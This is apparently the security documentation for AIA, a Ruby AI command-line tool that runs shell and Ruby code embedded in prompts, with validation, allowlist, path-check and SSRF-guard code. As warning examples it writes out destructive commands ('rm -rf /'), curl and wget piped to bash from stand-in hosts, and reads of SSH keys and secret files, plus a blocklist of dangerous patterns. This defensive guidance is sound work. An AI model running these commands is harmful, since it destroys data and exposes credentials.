
Security Considerations

AIA's power comes from its ability to execute shell commands, run embedded Ruby code, and interact with external tools. This flexibility requires careful attention to security practices.

⚠️ Important Security Warning

AIA executes shell commands and Ruby code embedded in prompts. This provides powerful functionality but requires caution:

  • Review prompts before execution, especially from untrusted sources
  • Avoid storing sensitive data in prompts (API keys, passwords)
  • Use parameterized prompts instead of hardcoding sensitive values
  • Restrict permissions on prompt directories when working on shared systems

Shell Command Execution Risks

The Philosophy: "Stupid is as Stupid Does"

AIA follows the philosophy that with great power comes great responsibility. As stated in the project:

"The catchphrase 'the prompt is the code' within AIA means that you have the power to execute any command you want, but you must be careful not to execute commands that could cause harm. AIA is not going to protect you from doing something stupid."

Best Practices for Shell Integration

✅ Safe Practices

# Use parameters for dynamic content
//shell ls -la [DIRECTORY]
//shell git status
//shell find [PROJECT_DIR] -name "*.rb" | head -10

# Use environment variables safely
Current user: $USER
Home directory: $HOME
Current date: $(date)

❌ Dangerous Practices

# Never use destructive commands
//shell rm -rf [DIRECTORY]  # Extremely dangerous!
//shell sudo rm -rf /       # Never do this!

# Avoid commands that could expose sensitive data
//shell cat /etc/passwd
//shell env | grep -i secret

Command Validation

When creating tools that execute shell commands, always validate inputs:

def execute(command:)
  # Validate command doesn't contain dangerous patterns
  dangerous_patterns = ['rm -rf', 'sudo', 'chmod 777', '> /dev/', 'dd if=']
  
  if dangerous_patterns.any? { |pattern| command.include?(pattern) }
    return { error: "Command contains potentially dangerous operations" }
  end
  
  # Proceed with execution
  `#{command}`
end
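
Blocklists like this are easy to bypass (extra whitespace, quoting, or an alias can slip past a literal string match), so prefer an allowlist when a tool only needs a few known commands. A minimal sketch, using a hypothetical allowlist of read-only programs:

require 'open3'
require 'shellwords'

# Hypothetical allowlist of read-only programs this tool is permitted to run
ALLOWED_COMMANDS = %w[ls cat git grep head wc].freeze

def execute(command:)
  # Split the command line into words without involving a shell
  program, *args = Shellwords.split(command)

  unless ALLOWED_COMMANDS.include?(program)
    return { error: "Command '#{program}' is not on the allowlist" }
  end

  # Running the program and arguments directly (no shell) means metacharacters
  # such as ;, |, and $() are passed through as literal text, not interpreted
  output, status = Open3.capture2e(program, *args)
  { output: output, exit_status: status.exitstatus }
rescue ArgumentError => e
  { error: "Could not parse command: #{e.message}" }
end

Because the program name and arguments are passed to Open3 as separate words, no shell is ever invoked, which removes an entire class of injection problems.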

Sensitive Data Protection

Parameterized Configuration

Never hardcode sensitive information in prompts:

# ✅ Good: Use parameters
//config api_key = [API_KEY]
//config database_url = [DATABASE_URL]

# ❌ Bad: Hardcode secrets
//config api_key = sk-1234567890abcdef
//config database_url = postgresql://user:password@host/db

Environment Variable Guidelines

# ✅ Safe environment variables
export AIA_MODEL=gpt-4o-mini
export AIA_PROMPTS_DIR=~/my-prompts
export AIA_VERBOSE=true

# ❌ Never put secrets in environment variables for AIA
export AIA_API_KEY=secret_key  # Don't do this

Configuration File Security

Protect configuration files containing sensitive data:

# Set restrictive permissions on config files
chmod 600 ~/.aia/config.yml

# Don't include secrets in main config - use parameters instead

File System Security

Prompt Directory Permissions

Set appropriate permissions on your prompts directory:

# Restrictive permissions for private prompts
chmod 700 ~/.prompts
chmod 600 ~/.prompts/*.txt

# For shared prompts, use a separate directory
mkdir ~/shared-prompts
chmod 755 ~/shared-prompts
chmod 644 ~/shared-prompts/*.txt
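
To spot files that drift from these permissions, a small Ruby audit script can help. A minimal sketch, assuming prompts live in the directory named by AIA_PROMPTS_DIR (defaulting to ~/.prompts):

# Flag prompt files that are readable or writable by group or others
prompts_dir = File.expand_path(ENV.fetch('AIA_PROMPTS_DIR', '~/.prompts'))

Dir.glob(File.join(prompts_dir, '**', '*')).each do |path|
  next unless File.file?(path)

  mode = File.stat(path).mode & 0o777
  next if (mode & 0o077).zero?

  puts format('%-60s %03o  consider: chmod 600 %s', path, mode, path)
end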

Tool File Security

When developing custom tools:

def execute(file_path:)
  # Validate the path: allow only simple characters and reject directory traversal
  if file_path.include?('..') || !file_path.match?(/\A[\w\-\/\.]+\z/)
    return { error: "Invalid file path" }
  end

  # Resolve to an absolute path so the checks below see the real location
  full_path = File.expand_path(file_path)

  # Prevent access to sensitive system files
  forbidden_paths = ['/etc/', '/var/', '/sys/', '/proc/']
  if forbidden_paths.any? { |path| full_path.start_with?(path) }
    return { error: "Access to system directories is forbidden" }
  end

  # Check that the file exists and is readable
  unless File.readable?(full_path)
    return { error: "File not found or not readable" }
  end

  File.read(full_path)
end

Tool Security

Custom Tool Development

When creating RubyLLM::Tool implementations:

class SecureFileTool < RubyLLM::Tool
  description "Securely read files with validation"
  param :file_path, desc: "Path to file (must be in allowed directories)"
  
  ALLOWED_DIRECTORIES = [
    ENV['HOME'],
    '/tmp',
    Dir.pwd
  ].compact.freeze
  
  def execute(file_path:)
    # Resolve full path to prevent relative path attacks
    full_path = File.expand_path(file_path)
    
    # Check that the file is inside an allowed directory (not just sharing a path prefix)
    allowed = ALLOWED_DIRECTORIES.any? do |dir|
      base = File.expand_path(dir)
      full_path == base || full_path.start_with?(base + File::SEPARATOR)
    end
    return { error: "File access restricted to allowed directories" } unless allowed
    
    # Additional validations...
    File.read(full_path)
  rescue => e
    { error: "Error reading file: #{e.message}" }
  end
end
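
You can exercise a tool class like this directly (for example in IRB) before handing it to a model; the paths below are only illustrations:

tool = SecureFileTool.new

tool.execute(file_path: '~/notes/todo.txt')  # passes the allowed-directory check (resolves under $HOME)
tool.execute(file_path: '/etc/passwd')       # rejected: outside the allowed directories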

Tool Filtering

Use tool filtering to limit available functionality:

# Only allow specific safe tools
aia --chat --tools shared --allowed_tools read_file,write_file

# Exclude potentially dangerous tools
aia --chat --tools ~/my-tools --rejected_tools admin,system,network

Prompt Review Guidelines

Before Running Untrusted Prompts

  1. Read the entire prompt file - including comments and directives
  2. Check for shell commands - look for //shell, $(...), and environment variables
  3. Review Ruby code - examine //ruby directives and ERB blocks
  4. Validate file inclusions - check //include directives for sensitive files
  5. Inspect configuration changes - review //config directives (a scanning sketch follows this list)
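
A quick way to apply steps 2 through 5 is to scan the prompt file for those directives before running it. A minimal sketch (saved as, say, scan_prompt.rb; the patterns mirror the directives listed above):

# scan_prompt.rb: print every line of a prompt file that contains a directive or embedded code
PATTERNS = {
  'shell directive'      => %r{^\s*//shell},
  'ruby directive'       => %r{^\s*//ruby},
  'include directive'    => %r{^\s*//include},
  'config directive'     => %r{^\s*//config},
  'command substitution' => /\$\(.+\)/,
  'environment variable' => /\$[A-Za-z_]\w*/,
  'ERB block'            => /<%.+%>/
}.freeze

prompt_file = ARGV.fetch(0) { abort 'usage: ruby scan_prompt.rb PROMPT_FILE' }

File.foreach(prompt_file).with_index(1) do |line, lineno|
  PATTERNS.each do |label, pattern|
    puts format('%4d [%s] %s', lineno, label, line.strip) if line.match?(pattern)
  end
end

Run it against the prompt file and review every flagged line before executing the prompt.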

Red Flags to Watch For

# Suspicious shell commands
//shell curl http://malicious-site.com/script.sh | bash
//shell wget -O - evil.com/malware | sh
//shell rm -rf $HOME
//shell chmod 777 /

# Dangerous Ruby code
//ruby system('rm -rf /')
//ruby File.delete('/important/file')
//ruby `curl malicious-site.com | bash`

# Sensitive file access
//include /etc/passwd
//include ~/.ssh/id_rsa
//shell cat ~/.env | grep -i secret

Network Security

API Key Management

# ✅ Secure API key handling
echo "Enter your OpenAI API key:"
read -s OPENAI_API_KEY
export OPENAI_API_KEY

# Or use a secure credential manager
aia --chat --config api_key=[API_KEY_FROM_VAULT]

Tool Network Access

Limit network access in custom tools:

require 'ipaddr'
require 'net/http'
require 'resolv'
require 'uri'

def execute(url:)
  # Validate the URL to prevent SSRF attacks
  uri = URI.parse(url)

  # Only plain http/https requests are allowed
  return { error: "Only http/https URLs are allowed" } unless uri.is_a?(URI::HTTP)

  # Resolve the host and block loopback, private, and link-local addresses;
  # checking the resolved IPs also catches hostnames that point at internal services
  addresses = Resolv.getaddresses(uri.host)
  return { error: "Could not resolve host" } if addresses.empty?

  internal = addresses.any? do |addr|
    ip = IPAddr.new(addr)
    ip.loopback? || ip.private? || ip.link_local?
  end
  return { error: "Access to internal addresses is forbidden" } if internal

  # Proceed with the external request
  Net::HTTP.get(uri)
rescue URI::InvalidURIError => e
  { error: "Invalid URL: #{e.message}" }
end

Multi-User Environment Security

Shared System Considerations

# Create user-specific prompts directories
export AIA_PROMPTS_DIR=/home/$USER/.prompts
mkdir -p $AIA_PROMPTS_DIR
chmod 700 $AIA_PROMPTS_DIR

# Avoid global prompt directories
# Don't use: export AIA_PROMPTS_DIR=/usr/share/prompts

Process Isolation

# Run AIA with limited privileges when possible
# Consider using containers or sandboxing for untrusted prompts

# Example with Docker (if available); the stock ruby image needs the aia gem installed first,
# and any provider API keys must be passed in with additional -e flags
docker run -it --rm \
  -v $HOME/.prompts:/prompts:ro \
  -e AIA_PROMPTS_DIR=/prompts \
  ruby:3.2 sh -c "gem install aia && aia my_prompt"

Incident Response

If You Suspect Compromise

  1. Stop AIA immediately - Ctrl+C or kill the process
  2. Review recent prompts - Check ~/.prompts/_prompts.log
  3. Check system for changes - Review file modifications, new processes
  4. Audit shell history - Look for unexpected commands
  5. Review network connections - Check for suspicious outbound traffic

Log Review

# Check AIA's log file for suspicious activity
tail -100 ~/.prompts/_prompts.log

# Review shell history for unexpected commands
history | grep -E "(rm|curl|wget|chmod|sudo)" | tail -20

# Check for new or modified files
find $HOME -newer ~/.prompts/_prompts.log -type f

Security Checklist

Before Using AIA

  • Set appropriate file permissions on prompts directory
  • Configure environment variables securely
  • Understand the risks of shell integration
  • Review any shared or downloaded prompts

Regular Security Practices

  • Regularly audit your prompts directory
  • Review and clean up old prompts
  • Monitor AIA's log file for unusual activity
  • Keep AIA and its dependencies updated
  • Use version control for important prompts

When Sharing Prompts

  • Remove any sensitive information
  • Add clear warnings about shell commands
  • Test prompts in isolated environments first
  • Provide clear documentation about what the prompt does

Conclusion

AIA's power comes with responsibility. By following these security practices, you can safely harness AIA's capabilities while protecting your systems and data. Remember: always review prompts before execution, especially from untrusted sources.

The key principle is: trust but verify. AIA gives you the tools to do amazing things, but it's up to you to use them safely.